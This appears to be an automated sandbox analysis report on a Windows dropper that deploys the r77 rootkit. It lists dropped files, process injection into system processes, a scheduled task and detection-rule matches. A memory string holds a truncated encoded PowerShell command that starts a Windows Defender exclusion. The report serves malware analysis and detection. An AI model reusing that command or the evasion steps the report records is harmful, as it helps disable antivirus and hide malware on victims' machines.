Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040290B FindFirstFileW,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,

Networking

barindex
Uses nslookup.exe to query domains
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

barindex
Very long command line found
Source: unknownProcess created: Commandline size = 2585
Source: unknownProcess created: Commandline size = 2578
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040755C
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005098
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4CED8
Source: Install.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Install.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey,
Source: chrome.exe.4.drStatic PE information: No import functions for PE file found
Source: 34432.exe.1.drStatic PE information: No import functions for PE file found
Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename34432.exe< vs Install.exe
Source: Install.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@44/26@1/1
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\desktop.iniJump to behavior
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,
Source: Install.exeVirustotal: Detection: 41%
Source: Install.exeReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\user\Desktop\Install.exeJump to behavior
Source: C:\Users\user\Desktop\Install.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
